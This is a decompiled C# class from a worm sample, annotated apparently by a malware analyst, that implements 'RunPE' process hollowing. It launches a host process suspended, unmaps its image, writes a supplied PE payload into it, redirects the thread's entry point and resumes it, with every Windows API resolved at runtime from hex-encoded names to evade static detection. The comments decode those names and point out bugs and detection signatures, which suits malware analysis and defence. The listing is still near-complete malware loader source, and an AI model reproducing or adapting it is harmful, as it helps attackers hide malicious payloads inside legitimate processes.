// Decompiled with JetBrains decompiler
// Type: BCV5StuB.RunPE
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace BCV5StuB
{
  /// <summary>
  /// Decompiled process-hollowing ("RunPE") loader. <see cref="SRexec(byte[], string)"/> starts
  /// <c>sVictim</c> with its primary thread suspended, unmaps the host's own image, writes the
  /// PE held in the byte array into the new process, points the thread at the payload's entry
  /// point and resumes it. The API sequence visible in this listing is
  /// CreateProcessA (CREATE_SUSPENDED) -> GetThreadContext -> ReadProcessMemory ->
  /// ZwUnmapViewOfSection -> VirtualAllocEx -> WriteProcessMemory -> VirtualProtectEx ->
  /// SetThreadContext -> ResumeThread, which is the classic hollowing signature a defender
  /// would look for in process/thread telemetry.
  ///
  /// Every API is resolved at runtime through <c>DynamicCall</c> (inherited from
  /// <c>NativeDllCalls</c>, which is not part of this listing) from hex-encoded ASCII module
  /// and export names, so none of these functions appears in the static import table.
  /// The <c>Microsoft.VisualBasic.CompilerServices</c> helpers (Conversions, Strings) and the
  /// never-assigned locals (<c>flag</c>, <c>lpEnvironment</c>, <c>num2</c>, <c>num8</c>, ...)
  /// suggest the original was VB.NET; as C# this listing does not compile unchanged.
  /// </summary>
  public sealed class RunPE : NativeDllCalls
  {
    // x86 CONTEXT flag values. SRexec writes the literal 65538 instead of CONTEXT86_INTEGER.
    private const int CONTEXT_X86 = 65536;
    private const int CONTEXT86_INTEGER = 65538;
    // VirtualAllocEx allocation types. SRexec passes the literal 12288 = MEM_COMMIT | MEM_RESERVE.
    private const long MEM_COMMIT = 4096;
    private const long MEM_RESERVE = 8192;
    // Page protections; these are the values in the lookup table inside Protect().
    private const long PAGE_EXECUTE_READWRITE = 64;
    private const long PAGE_EXECUTE_READ = 32;
    private const long PAGE_EXECUTE = 16;
    private const long PAGE_NOACCESS = 1;
    private const long PAGE_READWRITE = 4;
    private const uint PAGE_READONLY = 2;
    // Hex-encoded ASCII of "kernel32" and "ntdll". SRexec repeats the same literals inline
    // rather than referencing these constants; the encoding is trivially reversible.
    private const string KERNEL32HEX = "0x6b65726e656c3332";
    private const string NTDLLHEX = "0x6e74646c6c";

    [DebuggerNonUserCode]
    public RunPE()
    {
    }

    /// <summary>
    /// Maps a section's Characteristics to a page protection. The index is characteristics >> 29
    /// (computed with the rounding <see cref="RShift"/> below), i.e. the top three PE section
    /// flags (bit 29 execute, bit 30 read, bit 31 write). Table by index: 0 -> PAGE_NOACCESS,
    /// 1 -> PAGE_EXECUTE, 2 -> PAGE_READONLY, 3 -> PAGE_EXECUTE_READ, 4 -> PAGE_READWRITE,
    /// 5 -> PAGE_EXECUTE_READWRITE, 6 -> PAGE_READWRITE, 7 -> PAGE_EXECUTE_READWRITE.
    /// </summary>
    private long Protect(long characteristics) => Conversions.ToLong(new object[8]
    {
      (object) 1L,
      (object) 16L,
      (object) 2U,
      (object) 32L,
      (object) 4L,
      (object) 64L,
      (object) 4L,
      (object) 64L
    }[checked ((int) this.RShift(characteristics, 29L))]);

    /// <summary>
    /// Floating-point emulation of a logical right shift (VB6 style): divides by 2^n and then
    /// rounds to nearest with Math.Round, so when the discarded low bits are set the result can
    /// be one greater than a true shift would give.
    /// </summary>
    private long RShift(long lValue, long lNumberOfBitsToShift) => checked ((long) Math.Round(unchecked (this.vbLongToULong(lValue) / Math.Pow(2.0, (double) lNumberOfBitsToShift))));

    /// <summary>
    /// Reinterprets a negative long as a wrapped 32-bit unsigned value by adding 2^32;
    /// non-negative values pass through as doubles.
    /// </summary>
    private double vbLongToULong(long Value) => Value < 0L ? (double) Value + 4294967296.0 : (double) Value;

    /// <summary>
    /// Reads the PE at <paramref name="sExePath"/> and hands its bytes to the byte[] overload.
    /// The path is used as given, with no validation beyond File.Exists.
    /// </summary>
    /// <returns>The byte[] overload's result; when the file is missing it returns <c>flag</c>,
    /// which is never assigned (decompiler artefact; false under VB default initialisation).</returns>
    public bool SRexec(string sExePath, string sVictim)
    {
      bool flag;
      return File.Exists(sExePath) ? this.SRexec(File.ReadAllBytes(sExePath), sVictim) : flag;
    }

    /// <summary>
    /// Hollows a new instance of <paramref name="sVictim"/> with the PE image in <paramref name="b"/>.
    /// </summary>
    /// <param name="b">A complete 32-bit PE image as it appears on disk (headers + raw sections).</param>
    /// <param name="sVictim">Command line of the host process to create and hollow.</param>
    /// <returns>true only when SetThreadContext succeeds and ResumeThread reports a previous
    /// suspend count greater than zero; false on any of the early validation failures.</returns>
    public bool SRexec(byte[] b, string sVictim)
    {
      RunPE.IMAGE_DOS_HEADER imageDosHeader1 = new RunPE.IMAGE_DOS_HEADER();
      RunPE.CONTEXT lpContext = new RunPE.CONTEXT();
      RunPE.IMAGE_NT_HEADERS imageNtHeaders1 = new RunPE.IMAGE_NT_HEADERS();
      RunPE.IMAGE_SECTION_HEADER imageSectionHeader1 = new RunPE.IMAGE_SECTION_HEADER();
      RunPE.PROCESS_INFORMATION lpProcessInformation = new RunPE.PROCESS_INFORMATION();
      RunPE.STARTUPINFO lpStartupInfo = new RunPE.STARTUPINFO();
      RunPE.SECURITY_ATTRIBUTES lpProcessAttributes = new RunPE.SECURITY_ATTRIBUTES();
      RunPE.SECURITY_ATTRIBUTES lpThreadAttributes = new RunPE.SECURITY_ATTRIBUTES();
      // Pin the payload so its address can be used for Marshal.PtrToStructure on the DOS header.
      GCHandle gcHandle = GCHandle.Alloc((object) b, GCHandleType.Pinned);
      IntPtr ptr = gcHandle.AddrOfPinnedObject();
      int int32 = ptr.ToInt32();
      object structure1 = Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), imageDosHeader1.GetType());
      RunPE.IMAGE_DOS_HEADER imageDosHeader2;
      RunPE.IMAGE_DOS_HEADER imageDosHeader3 = structure1 != null ? (RunPE.IMAGE_DOS_HEADER) structure1 : imageDosHeader2;
      // NOTE(review): the handle is released here, but int32 (the pinned address) is still used
      // further down to read the NT and section headers, after the array is no longer pinned.
      gcHandle.Free();
      IntPtr lpEnvironment;
      // "0x43726561746550726f6365737341" decodes to "CreateProcessA"; "0x6b65726e656c3332" to "kernel32".
      // dwCreationFlags 4 = CREATE_SUSPENDED: the host starts with its primary thread suspended and
      // never executes its own code. lpEnvironment is never assigned (decompiler artefact).
      if (!((RunPE.CreateProcessA) this.DynamicCall("0x6b65726e656c3332", "0x43726561746550726f6365737341", typeof (RunPE.CreateProcessA)))((string) null, sVictim, ref lpProcessAttributes, ref lpThreadAttributes, false, 4U, lpEnvironment, (string) null, ref lpStartupInfo, out lpProcessInformation))
        return false;
      // NT headers live at e_lfanew from the start of the buffer.
      ptr = new IntPtr(checked (int32 + imageDosHeader3.e_lfanew));
      object structure2 = Marshal.PtrToStructure(ptr, imageNtHeaders1.GetType());
      RunPE.IMAGE_NT_HEADERS imageNtHeaders2;
      RunPE.IMAGE_NT_HEADERS imageNtHeaders3 = structure2 != null ? (RunPE.IMAGE_NT_HEADERS) structure2 : imageNtHeaders2;
      // cb is filled in only after CreateProcessA has already consumed lpStartupInfo.
      // Strings.Len of a structure presumably yields its byte size here.
      lpStartupInfo.cb = Strings.Len((object) lpStartupInfo);
      // 65538 = CONTEXT86_INTEGER: ask for the integer registers (Ebx and Eax are used below).
      lpContext.ContextFlags = 65538U;
      // Validate the payload: NT signature must be 17744 ("PE\0\0", IMAGE_NT_SIGNATURE in the enum
      // below) and DOS magic 23117 ("MZ", IMAGE_DOS_SIGNATURE). Non-short-circuit '|' is intentional VB style.
      if (imageNtHeaders3.Signature != 17744U | imageDosHeader3.e_magic != (ushort) 23117)
        return false;
      // Hex names decode to GetThreadContext, ReadProcessMemory and (from "ntdll") ZwUnmapViewOfSection.
      RunPE.GetThreadContext getThreadContext = (RunPE.GetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x476574546872656164436f6e74657874", typeof (RunPE.GetThreadContext));
      RunPE.ReadProcessMemory readProcessMemory1 = (RunPE.ReadProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x5265616450726f636573734d656d6f7279", typeof (RunPE.ReadProcessMemory));
      RunPE.ZwUnmapViewOfSection unmapViewOfSection = (RunPE.ZwUnmapViewOfSection) this.DynamicCall("0x6e74646c6c", "0x5a77556e6d6170566965774f6653656374696f6e", typeof (RunPE.ZwUnmapViewOfSection));
      int num1 = getThreadContext(lpProcessInformation.hThread, ref lpContext) ? 1 : 0;
      RunPE.ReadProcessMemory readProcessMemory2 = readProcessMemory1;
      IntPtr hProcess1 = lpProcessInformation.hProcess;
      // Reads 4 bytes at Ebx+8 in the suspended process. In a freshly created x86 process the
      // initial thread context's Ebx presumably holds the PEB and offset 8 is ImageBaseAddress
      // (standard hollowing, not provable from this listing); the value read is what gets unmapped.
      int lpBaseAddress1 = checked ((int) ((long) lpContext.Ebx + 8L));
      long num2;
      ptr = (IntPtr) num2;
      ref IntPtr local1 = ref ptr;
      int num3 = 0;
      ref int local2 = ref num3;
      int num4 = readProcessMemory2(hProcess1, lpBaseAddress1, ref local1, 4, ref local2);
      long num5 = (long) ptr;
      // The read is treated as successful for any non-negative return value, including 0.
      int num6 = num4 >= 0 ? 1 : 0;
      // Evict the host's original image from the new process.
      if ((num1 & num6 & (unmapViewOfSection(lpProcessInformation.hProcess, (IntPtr) num5) >= 0L ? 1 : 0)) == 0)
        return false;
      // "0x5669727475616c416c6c6f634578" = VirtualAllocEx. Reserve+commit (12288 = MEM_COMMIT | MEM_RESERVE)
      // SizeOfImage bytes at the payload's preferred ImageBase, initially PAGE_READWRITE (4).
      // The image is written at whatever address comes back; nothing in this method applies relocations.
      uint num7 = checked ((uint) (int) ((RunPE.VirtualAllocEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c416c6c6f634578", typeof (RunPE.VirtualAllocEx)))(lpProcessInformation.hProcess, (IntPtr) (long) imageNtHeaders3.OptionalHeader.ImageBase, imageNtHeaders3.OptionalHeader.SizeOfImage, 12288U, 4U));
      if (num7 == 0U)
        return false;
      // "0x577269746550726f636573734d656d6f7279" = WriteProcessMemory. Copy the PE headers
      // (the first SizeOfHeaders bytes of b) to the new base. num8 is never assigned (decompiler artefact).
      RunPE.WriteProcessMemory writeProcessMemory1 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
      IntPtr hProcess2 = lpProcessInformation.hProcess;
      IntPtr lpBaseAddress2 = (IntPtr) (long) num7;
      byte[] lpBuffer1 = b;
      int sizeOfHeaders = checked ((int) imageNtHeaders3.OptionalHeader.SizeOfHeaders);
      uint num8;
      int num9 = checked ((int) num8);
      ref int local3 = ref num9;
      int num10 = writeProcessMemory1(hProcess2, lpBaseAddress2, lpBuffer1, sizeOfHeaders, out local3) ? 1 : 0;
      uint num11 = checked ((uint) num9);
      // Section table starts right after the NT headers: 248 = 4 (Signature) + 20 (IMAGE_FILE_HEADER)
      // + 224 (IMAGE_OPTIONAL_HEADER32 with 16 data directories), matching the structs declared below.
      long num12 = (long) checked (imageDosHeader3.e_lfanew + 248);
      int num13 = checked ((int) imageNtHeaders3.FileHeader.NumberOfSections - 1);
      int num14 = 0;
      // Per section: copy its raw bytes into the new process at base + VirtualAddress and set the
      // region's protection from its Characteristics. Each on-disk section header is 40 bytes.
      while (num14 <= num13)
      {
        ptr = new IntPtr(checked ((long) int32 + num12 + (long) (num14 * 40)));
        object structure3 = Marshal.PtrToStructure(ptr, imageSectionHeader1.GetType());
        RunPE.IMAGE_SECTION_HEADER imageSectionHeader2;
        imageSectionHeader1 = structure3 != null ? (RunPE.IMAGE_SECTION_HEADER) structure3 : imageSectionHeader2;
        // Buffer is one byte larger than SizeOfRawData; the loop copies exactly SizeOfRawData bytes
        // from PointerToRawData. No bounds check against b.Length.
        byte[] numArray = new byte[checked ((int) imageSectionHeader1.SizeOfRawData + 1)];
        int num15 = checked ((int) ((long) imageSectionHeader1.SizeOfRawData - 1L));
        int index = 0;
        while (index <= num15)
        {
          numArray[index] = b[checked ((int) ((long) imageSectionHeader1.PointerToRawData + (long) index))];
          checked { ++index; }
        }
        // Both exports are re-resolved on every iteration. "0x5669727475616c50726f746563744578" = VirtualProtectEx.
        RunPE.WriteProcessMemory writeProcessMemory2 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
        RunPE.VirtualProtectEx virtualProtectEx = (RunPE.VirtualProtectEx) this.DynamicCall("0x6b65726e656c3332", "0x5669727475616c50726f746563744578", typeof (RunPE.VirtualProtectEx));
        RunPE.WriteProcessMemory writeProcessMemory3 = writeProcessMemory2;
        IntPtr hProcess3 = lpProcessInformation.hProcess;
        IntPtr lpBaseAddress3 = (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress);
        byte[] lpBuffer2 = numArray;
        int sizeOfRawData = checked ((int) imageSectionHeader1.SizeOfRawData);
        num9 = checked ((int) num11);
        ref int local4 = ref num9;
        // num16 and num17 (write / protect results) are computed but never checked.
        int num16 = writeProcessMemory3(hProcess3, lpBaseAddress3, lpBuffer2, sizeOfRawData, out local4) ? 1 : 0;
        num11 = checked ((uint) num9);
        // Protection comes from Protect(Characteristics); the last argument (old protection) is passed
        // by value because the delegate declares it as a plain uint, so the old value is discarded.
        int num17 = virtualProtectEx(lpProcessInformation.hProcess, (IntPtr) (long) checked (num7 + imageSectionHeader1.VirtualAddress), (UIntPtr) imageSectionHeader1.Misc.VirtualSize, (UIntPtr) checked ((ulong) this.Protect((long) imageSectionHeader1.Characteristics)), checked ((uint) num5));
        checked { ++num14; }
      }
      // Write the new base address back over the 4 bytes read earlier at Ebx+8.
      byte[] bytes = BitConverter.GetBytes(num7);
      RunPE.WriteProcessMemory writeProcessMemory4 = (RunPE.WriteProcessMemory) this.DynamicCall("0x6b65726e656c3332", "0x577269746550726f636573734d656d6f7279", typeof (RunPE.WriteProcessMemory));
      IntPtr hProcess4 = lpProcessInformation.hProcess;
      IntPtr lpBaseAddress4 = (IntPtr) checked ((long) lpContext.Ebx + 8L);
      byte[] lpBuffer3 = bytes;
      num9 = checked ((int) num11);
      ref int local5 = ref num9;
      int num18 = writeProcessMemory4(hProcess4, lpBaseAddress4, lpBuffer3, 4, out local5) ? 1 : 0;
      num8 = checked ((uint) num9);
      // Redirect the suspended thread: Eax = new base + AddressOfEntryPoint (in the initial x86 thread
      // context Eax is presumably the start address the loader jumps to — not provable from this listing).
      lpContext.Eax = checked (num7 + imageNtHeaders3.OptionalHeader.AddressOfEntryPoint);
      // "0x536574546872656164436f6e74657874" = SetThreadContext, "0x526573756d65546872656164" = ResumeThread.
      RunPE.SetThreadContext setThreadContext = (RunPE.SetThreadContext) this.DynamicCall("0x6b65726e656c3332", "0x536574546872656164436f6e74657874", typeof (RunPE.SetThreadContext));
      RunPE.ResumeThread resumeThread = (RunPE.ResumeThread) this.DynamicCall("0x6b65726e656c3332", "0x526573756d65546872656164", typeof (RunPE.ResumeThread));
      bool flag;
      // ResumeThread returns the previous suspend count; > 0 means the thread was actually released.
      // flag is never assigned (decompiler artefact). Process and thread handles are never closed.
      return setThreadContext(lpProcessInformation.hThread, ref lpContext) ? resumeThread(lpProcessInformation.hThread) > 0U : flag;
    }

    // Win32 STARTUPINFO (Unicode strings). Only cb is touched by SRexec, and only after use.
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    private struct STARTUPINFO
    {
      public int cb;
      public string lpReserved;
      public string lpDesktop;
      public string lpTitle;
      public int dwX;
      public int dwY;
      public int dwXSize;
      public int dwYSize;
      public int dwXCountChars;
      public int dwYCountChars;
      public int dwFillAttribute;
      public int dwFlags;
      public short wShowWindow;
      public short cbReserved2;
      public int lpReserved2;
      public int hStdInput;
      public int hStdOutput;
      public int hStdError;
    }

    // Handles of the hollowed child; SRexec uses hProcess and hThread.
    private struct PROCESS_INFORMATION
    {
      public IntPtr hProcess;
      public IntPtr hThread;
      public int dwProcessId;
      public int dwThreadId;
    }

    // DOS stub header; SRexec reads e_magic ("MZ" check) and e_lfanew (offset of the NT headers).
    private struct IMAGE_DOS_HEADER
    {
      public ushort e_magic;
      public ushort e_cblp;
      public ushort e_cp;
      public ushort e_crlc;
      public ushort e_cparhdr;
      public ushort e_minalloc;
      public ushort e_maxalloc;
      public ushort e_ss;
      public ushort e_sp;
      public ushort e_csum;
      public ushort e_ip;
      public ushort e_cs;
      public ushort e_lfarlc;
      public ushort e_ovno;
      [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
      public ushort[] e_res1;
      public ushort e_oemid;
      public ushort e_oeminfo;
      [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
      public ushort[] e_res2;
      public int e_lfanew;
    }

    // Passed zero-initialised to CreateProcessA for both process and thread.
    private struct SECURITY_ATTRIBUTES
    {
      public int nLength;
      public IntPtr lpSecurityDescriptor;
      public int bInheritHandle;
    }

    // x87 state embedded in CONTEXT; not read by SRexec.
    private struct FLOATING_SAVE_AREA
    {
      public uint ControlWord;
      public uint StatusWord;
      public uint TagWord;
      public uint ErrorOffset;
      public uint ErrorSelector;
      public uint DataOffset;
      public uint DataSelector;
      [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
      public byte[] RegisterArea;
      public uint Cr0NpxState;
    }

    // 32-bit thread CONTEXT. SRexec sets ContextFlags, reads Ebx and writes Eax.
    private struct CONTEXT
    {
      public uint ContextFlags;
      public uint Dr0;
      public uint Dr1;
      public uint Dr2;
      public uint Dr3;
      public uint Dr6;
      public uint Dr7;
      public RunPE.FLOATING_SAVE_AREA FloatSave;
      public uint SegGs;
      public uint SegFs;
      public uint SegEs;
      public uint SegDs;
      public uint Edi;
      public uint Esi;
      public uint Ebx;
      public uint Edx;
      public uint Ecx;
      public uint Eax;
      public uint Ebp;
      public uint Eip;
      public uint SegCs;
      public uint EFlags;
      public uint Esp;
      public uint SegSs;
      [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
      public byte[] ExtendedRegisters;
    }

    // PE32 optional header (224 bytes with the 16 data directories). SRexec reads
    // AddressOfEntryPoint, ImageBase, SizeOfImage and SizeOfHeaders.
    private struct IMAGE_OPTIONAL_HEADER32
    {
      public ushort Magic;
      public byte MajorLinkerVersion;
      public byte MinorLinkerVersion;
      public uint SizeOfCode;
      public uint SizeOfInitializedData;
      public uint SizeOfUninitializedData;
      public uint AddressOfEntryPoint;
      public uint BaseOfCode;
      public uint BaseOfData;
      public uint ImageBase;
      public uint SectionAlignment;
      public uint FileAlignment;
      public ushort MajorOperatingSystemVersion;
      public ushort MinorOperatingSystemVersion;
      public ushort MajorImageVersion;
      public ushort MinorImageVersion;
      public ushort MajorSubsystemVersion;
      public ushort MinorSubsystemVersion;
      public uint Win32VersionValue;
      public uint SizeOfImage;
      public uint SizeOfHeaders;
      public uint CheckSum;
      public ushort Subsystem;
      public ushort DllCharacteristics;
      public uint SizeOfStackReserve;
      public uint SizeOfStackCommit;
      public uint SizeOfHeapReserve;
      public uint SizeOfHeapCommit;
      public uint LoaderFlags;
      public uint NumberOfRvaAndSizes;
      [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
      public RunPE.IMAGE_DATA_DIRECTORY[] DataDirectory;
    }

    // COFF file header (20 bytes). SRexec reads NumberOfSections.
    private struct IMAGE_FILE_HEADER
    {
      public ushort Machine;
      public ushort NumberOfSections;
      public uint TimeDateStamp;
      public uint PointerToSymbolTable;
      public uint NumberOfSymbols;
      public ushort SizeOfOptionalHeader;
      public ushort Characteristics;
    }

    private struct IMAGE_DATA_DIRECTORY
    {
      public uint VirtualAddress;
      public uint Size;
    }

    // Signature (4) + file header (20) + optional header (224) = 248, the offset SRexec uses for the section table.
    private struct IMAGE_NT_HEADERS
    {
      public uint Signature;
      public RunPE.IMAGE_FILE_HEADER FileHeader;
      public RunPE.IMAGE_OPTIONAL_HEADER32 OptionalHeader;
    }

    // Union in the native header; declared here as two sequential fields. SRexec reads VirtualSize.
    private struct Misc
    {
      public uint PhysicalAddress;
      public uint VirtualSize;
    }

    // Section table entry. SRexec reads VirtualAddress, SizeOfRawData, PointerToRawData,
    // Misc.VirtualSize and Characteristics while stepping through the table in 40-byte strides.
    private struct IMAGE_SECTION_HEADER
    {
      // Declared as a single byte here, whereas the on-disk Name field is 8 bytes wide; whether a
      // marshalling attribute was dropped by the decompiler cannot be told from this listing.
      public byte Name;
      public RunPE.Misc Misc;
      public uint VirtualAddress;
      public uint SizeOfRawData;
      public uint PointerToRawData;
      public uint PointerToRelocations;
      public uint PointerToLinenumbers;
      public ushort NumberOfRelocations;
      public ushort NumberOfLinenumbers;
      public uint Characteristics;
    }

    // PE signature constants. SRexec compares against the literals 17744 (IMAGE_NT_SIGNATURE,
    // "PE\0\0") and 23117 (IMAGE_DOS_SIGNATURE, "MZ") rather than these names.
    private enum ImageSignatureTypes
    {
      IMAGE_OS2_SIGNATURE_LE = 17740, // 0x0000454C
      IMAGE_VXD_SIGNATURE = 17740, // 0x0000454C
      IMAGE_OS2_SIGNATURE = 17742, // 0x0000454E
      IMAGE_NT_SIGNATURE = 17744, // 0x00004550
      IMAGE_DOS_SIGNATURE = 23117, // 0x00005A4D
    }

    // Delegate shapes that DynamicCall binds to the runtime-resolved exports. These are the only
    // place the API names appear in clear text in this listing.
    private delegate uint ResumeThread(IntPtr hThread);

    private delegate bool GetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext);

    private delegate bool SetThreadContext(IntPtr hThread, ref RunPE.CONTEXT lpContext);

    private delegate bool CreateProcessA(
      string lpApplicationName,
      string lpCommandLine,
      ref RunPE.SECURITY_ATTRIBUTES lpProcessAttributes,
      ref RunPE.SECURITY_ATTRIBUTES lpThreadAttributes,
      bool bInheritHandles,
      uint dwCreationFlags,
      IntPtr lpEnvironment,
      string lpCurrentDirectory,
      [In] ref RunPE.STARTUPINFO lpStartupInfo,
      out RunPE.PROCESS_INFORMATION lpProcessInformation);

    private delegate bool WriteProcessMemory(
      IntPtr hProcess,
      IntPtr lpBaseAddress,
      byte[] lpBuffer,
      int iSize,
      out int lpNumberOfBytesWritten);

    // Declared to return int and to take the target address as int; SRexec only tests the result for >= 0.
    private delegate int ReadProcessMemory(
      IntPtr hProcess,
      int lpBaseAddress,
      ref IntPtr lpbuffer,
      int size,
      ref int lpNumberOfBytesRead);

    // Native NTSTATUS surfaced as long; SRexec treats >= 0 as success.
    private delegate long ZwUnmapViewOfSection(IntPtr hProcess, IntPtr BaseAddress);

    private delegate IntPtr VirtualAllocEx(
      IntPtr hProcess,
      IntPtr lpAddress,
      uint dwSize,
      uint flAllocationType,
      uint flProtect);

    // lpflOldProtect is a by-value uint (the [Out] attribute has no effect on a value parameter),
    // so the previous protection is never returned to the caller.
    private delegate int VirtualProtectEx(
      IntPtr hProcess,
      IntPtr lpAddress,
      UIntPtr dwSize,
      UIntPtr flNewProtect,
      [Out] uint lpflOldProtect);
  }
}